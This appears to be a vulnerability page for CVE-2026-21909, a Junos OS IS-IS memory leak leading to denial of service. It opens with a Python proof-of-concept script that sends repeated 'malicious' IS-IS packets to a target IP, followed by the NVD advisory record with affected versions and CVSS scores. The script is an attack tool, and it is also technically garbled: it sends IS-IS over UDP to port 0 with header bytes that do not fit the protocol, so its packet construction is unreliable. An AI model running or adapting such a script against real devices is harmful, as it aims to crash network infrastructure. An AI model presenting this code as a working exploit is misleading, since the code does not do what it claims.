CVE-2026-21909

#!/usr/bin/env python3 """ CVE-2026-21909 PoC - Juniper Junos OS IS-IS Memory Leak This PoC demonstrates the memory leak vulnerability in IS-IS processing. Note: Use only for authorized security testing. """ import socket import struct import sys def create_isis_packet(): """Create a malformed IS-IS LSP packet to trigger memory leak""" # IS-IS Header isis_header = bytes([ 0xE0, # Pdu type: LSP 0x00, # Header length 0x00, 0x00, # Version 0x01, # ID length 0x00, # Max areas 0x00, # PDU lifetime ]) # Add malformed TLVs to trigger memory leak tlv_data = bytes([ 0x22, 0x00, # TLV type: IS Neighbors 0x00, 0x00, # TLV length ]) return isis_header + tlv_data def send_isis_packets(target_ip, port=0, count=100): """Send malicious IS-IS packets to target""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = create_isis_packet() print(f"[*] Sending {count} malicious IS-IS packets to {target_ip}") for i in range(count): try: sock.sendto(packet, (target_ip, port)) print(f"[+] Packet {i+1}/{count} sent") except Exception as e: print(f"[-] Error: {e}") sock.close() print("[*] Attack completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2026-21909.py <target_ip>") sys.exit(1) target = sys.argv[1] send_isis_packets(target)

{"cve": {"id": "CVE-2026-21909", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:06.727", "lastModified": "2026-01-23T19:40:48.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon (rpd) Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated attacker controlling an adjacent IS-IS neighbor to send a specific update packet causing a memory leak. Continued receipt and processing of these packets will exhaust all available memory, crashing rpd and creating a Denial of Service (DoS) condition.\n\nMemory usage can be monitored through the use of the 'show task memory detail' command. For example:\n\nuser@junos> show task memory detail | match ted-infra\n  TED-INFRA-COOKIE           25   1072     28   1184     229\n\n\n\nuser@junos> \n\nshow task memory detail | match ted-infra\n  TED-INFRA-COOKIE           31   1360     34   1472     307\n\nThis issue affects:\n\nJunos OS: \n\n * from 23.2 before 23.2R2, \n * from 23.4 before 23.4R1-S2, 23.4R2, \n * from 24.1 before 24.1R2; \n\n\nJunos OS Evolved: \n\n * from 23.2 before 23.2R2-EVO, \n * from 23.4 before 23.4R1-S2-EVO, 23.4R2-EVO, \n * from 24.1 before 24.1R2-EVO.\n\n\nThis issue does not affect Junos OS versions before 23.2R1 or Junos OS Evolved versions before 23.2R1-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de Missing Release of Memory after Effective Lifetime en el demonio del protocolo de enrutamiento (rpd) de Juniper Networks Junos OS y Junos OS Evolved permite a un atacante no autenticado que controla un vecino IS-IS adyacente enviar un paquete de actualización específico causando una fuga de memoria. La recepción y el procesamiento continuos de estos paquetes agotarán toda la memoria disponible, bloqueando rpd y creando una condición de denegación de servicio (DoS).\n\nEl uso de la memoria se puede monitorear mediante el uso del comando 'show task memory detail'. Por ejemplo:\n\nuser@junos&gt; show task memory detail | match ted-infra\n&#xa0; TED-INFRA-COOKIE &#xa0; &#xa0; &#xa0; &#xa0; &#xa0; 25 &#xa0; 1072 &#xa0; &#xa0; 28 &#xa0; 1184 &#xa0; &#xa0; 229\n\n\n\nuser@junos&gt; \n\nshow task memory detail | match ted-infra\n&#xa0; TED-INFRA-COOKIE &#xa0; &#xa0; &#xa0; &#xa0; &#xa0; 31 &#xa0; 1360 &#xa0; &#xa0; 34 &#xa0; 1472 &#xa0; &#xa0; 307\n\nEste problema afecta a:\n\nJunos OS:\n\n * desde 23.2 anterior a 23.2R2,\n * desde 23.4 anterior a 23.4R1-S2, 23.4R2,\n * desde 24.1 anterior a 24.1R2;\n\nJunos OS Evolved:\n\n * desde 23.2 anterior a 23.2R2-EVO,\n * desde 23.4 anterior a 23.4R1-S2-EVO, 23.4R2-EVO,\n * desde 24.1 anterior a 24.1R2-EVO.\n\nEste problema no afecta a las versiones de Junos OS anteriores a 23.2R1 ni a las versiones de Junos OS Evolved anteriores a 23.2R1-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Green", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "GREEN"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected] ... (truncated)